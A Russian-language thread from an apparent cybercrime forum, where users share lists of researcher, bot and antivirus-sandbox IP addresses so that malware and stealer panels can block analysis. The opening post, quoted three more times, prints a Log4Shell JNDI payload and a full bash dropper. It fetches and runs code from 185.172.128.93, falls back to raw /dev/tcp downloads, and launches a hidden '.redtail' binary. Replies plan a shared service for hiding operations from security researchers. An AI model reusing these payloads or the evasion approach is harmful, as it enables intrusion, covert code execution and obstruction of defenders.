What's new
By:
Filters
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

BOT IP

S

secidiot

Midle Weight
Депозит
$0
IP адреса ботов, кравлеров, ресечеров, ав сендбоксов и тп за последние 3 месяца после пролива ≈ 100к логов
Есть дубли и ipv6

UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')

Decode Stage1:
Код: Скопировать в буфер обмена
Code: 
#!/bin/bash
R=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh)
echo "$R" | sh -s log4shell

Stage2:
Код: Скопировать в буфер обмена
Code: 
#!/bin/bash

dlr() {
  wget http://185.172.128.93/$1 || curl -O http://185.172.128.93/$1
  if [ $? -ne 0 ]; then
    exec 3<>"/dev/tcp/185.172.128.93/80"
    echo -e "GET /$1 HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3
    (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 >$1
    exec 3>&-
  fi
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 .redtail
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 .redtail
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 .redtail
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 .redtail
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >.redtail
    chmod +x .redtail
    ./.redtail $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x .redtail
  ./.redtail $1 >/dev/null 2>&1
fi

Вложения​


  • bot.txt
    1.2 МБ · Просмотры: 21
 
secidiot said:
secidiot сказал(а):
IP адреса ботов, кравлеров, ресечеров, ав сендбоксов и тп за последние 3 месяца после пролива ≈ 100к логов
Есть дубли и ipv6

UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')

Decode Stage1:
Код: Скопировать в буфер обмена
Code: 
#!/bin/bash
R=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh)
echo "$R" | sh -s log4shell

Stage2:
Код: Скопировать в буфер обмена
Code: 
#!/bin/bash

dlr() {
  wget http://185.172.128.93/$1 || curl -O http://185.172.128.93/$1
  if [ $? -ne 0 ]; then
    exec 3<>"/dev/tcp/185.172.128.93/80"
    echo -e "GET /$1 HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3
    (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 >$1
    exec 3>&-
  fi
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 .redtail
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 .redtail
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 .redtail
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 .redtail
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >.redtail
    chmod +x .redtail
    ./.redtail $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x .redtail
  ./.redtail $1 >/dev/null 2>&1
fi
Нажмите, чтобы раскрыть...
Click to expand...
Пасиб бр
 
secidiot said:
secidiot сказал(а):
IP адреса ботов, кравлеров, ресечеров, ав сендбоксов и тп за последние 3 месяца после пролива ≈ 100к логов
Есть дубли и ipv6

UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')

Decode Stage1:
Код: Скопировать в буфер обмена
Code: 
#!/bin/bash
R=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh)
echo "$R" | sh -s log4shell

Stage2:
Код: Скопировать в буфер обмена
Code: 
#!/bin/bash

dlr() {
  wget http://185.172.128.93/$1 || curl -O http://185.172.128.93/$1
  if [ $? -ne 0 ]; then
    exec 3<>"/dev/tcp/185.172.128.93/80"
    echo -e "GET /$1 HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3
    (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 >$1
    exec 3>&-
  fi
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 .redtail
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 .redtail
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 .redtail
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 .redtail
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >.redtail
    chmod +x .redtail
    ./.redtail $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x .redtail
  ./.redtail $1 >/dev/null 2>&1
fi
Нажмите, чтобы раскрыть...
Click to expand...
А как изначально из остеивал по каким параметрам?
 
Надо создать общий какой то проект в котором можно делится и записывать ботов.
 
_lain said:
_lain сказал(а):
Надо создать общий какой то проект в котором можно делится и записывать ботов.
Нажмите, чтобы раскрыть...
Click to expand...
Тему новую / раздел открыть было б прикольно, считай у каждого будет лодер за сущие копейки, меня ток ручные проверялы побешивают
 
MoilerRenoiler said:
MoilerRenoiler сказал(а):
Тему новую / раздел открыть было б прикольно, считай у каждого будет лодер за сущие копейки, меня ток ручные проверялы побешивают
Нажмите, чтобы раскрыть...
Click to expand...
Надо именно сервис, где будут проверенные те кто записывает ботов чтоб не засирать, а делится со всеми бесплатно, это уже затруднит ресерчерам работу, и аверам. Их запросы тупо будут блокироваться
 
_lain said:
_lain сказал(а):
Надо именно сервис, где будут проверенные те кто записывает ботов чтоб не засирать, а делится со всеми бесплатно
Нажмите, чтобы раскрыть...
Click to expand...
ну хз тогда легче сайтик поднять где по кодовому слову список дается
 
Вот еще ботов список кому нужно, набежало в панельку стилака за месяца так 4. 20 414 шт.

Вложения​


  • bots.txt
    287.3 КБ · Просмотры: 13
 
secidiot said:
secidiot сказал(а):
IP адреса ботов, кравлеров, ресечеров, ав сендбоксов и тп за последние 3 месяца после пролива ≈ 100к логов
Есть дубли и ipv6

UPD: Только заметил, улыбнуло) Какой то ресечер сканил на log4shell (это кто то руками проверял а не бот, из за настройки веб сервера что он недоступен из вне)
Stage1:
t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.98.11.82:2411/TomcatBypass/Command/Base64/Y3VybCBodHRwOi8vMTg1LjE3Mi4xMjguOTMvbGcgfHNoIHx8IHdnZXQgLU8tIGh0dHA6Ly8xODUuMTcyLjEyOC45My9sZyB8IHNo}')

Decode Stage1:
Код: Скопировать в буфер обмена
Code: 
#!/bin/bash
R=$(wget -O- http://185.172.128.93/sh || curl http://185.172.128.93/sh)
echo "$R" | sh -s log4shell

Stage2:
Код: Скопировать в буфер обмена
Code: 
#!/bin/bash

dlr() {
  wget http://185.172.128.93/$1 || curl -O http://185.172.128.93/$1
  if [ $? -ne 0 ]; then
    exec 3<>"/dev/tcp/185.172.128.93/80"
    echo -e "GET /$1 HTTP/1.0\r\nHost: 185.172.128.93\r\n\r\n" >&3
    (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 >$1
    exec 3>&-
  fi
}

NOEXEC_DIRS=$(cat /proc/mounts | grep 'noexec' | awk '{print $2}')
EXCLUDE=""

for dir in $NOEXEC_DIRS; do
  EXCLUDE="${EXCLUDE} -not -path \"$dir\" -not -path \"$dir/*\""
done

FOLDERS=$(eval find / -type d -user $(whoami) -perm -u=rwx -not -path \"/tmp/*\" -not -path \"/proc/*\" $EXCLUDE 2>/dev/null)
ARCH=$(uname -mp)
OK=true

for i in $FOLDERS /tmp /var/tmp /dev/shm; do
  if cd "$i" && touch .testfile && (dd if=/dev/zero of=.testfile2 bs=2M count=1 >/dev/null 2>&1 || truncate -s 2M .testfile2 >/dev/null 2>&1); then
    rm -rf .testfile .testfile2
    break
  fi
done

dlr clean
chmod +x clean
sh clean >/dev/null 2>&1
rm -rf clean

rm -rf .redtail
if echo "$ARCH" | grep -q "x86_64" || echo "$ARCH" | grep -q "amd64"; then
  dlr x86_64
  mv x86_64 .redtail
elif echo "$ARCH" | grep -q "i[3456]86"; then
  dlr i686
  mv i686 .redtail
elif echo "$ARCH" | grep -q "armv8" || echo "$ARCH" | grep -q "aarch64"; then
  dlr aarch64
  mv aarch64 .redtail
elif echo "$ARCH" | grep -q "armv7"; then
  dlr arm7
  mv arm7 .redtail
else
  OK=false
  for a in x86_64 i686 aarch64 arm7; do
    dlr $a
    cat $a >.redtail
    chmod +x .redtail
    ./.redtail $1 >/dev/null 2>&1
    rm -rf $a
  done
fi

if [ $OK = true ]; then
  chmod +x .redtail
  ./.redtail $1 >/dev/null 2>&1
fi
Нажмите, чтобы раскрыть...
Click to expand...
да один фиг пролазят засланцы

И по кукам и по ип фильтрам обходят и по гео тоже

Тут нужно хорошо подумать как их фильтровать
 
You must log in or register to reply here.
Top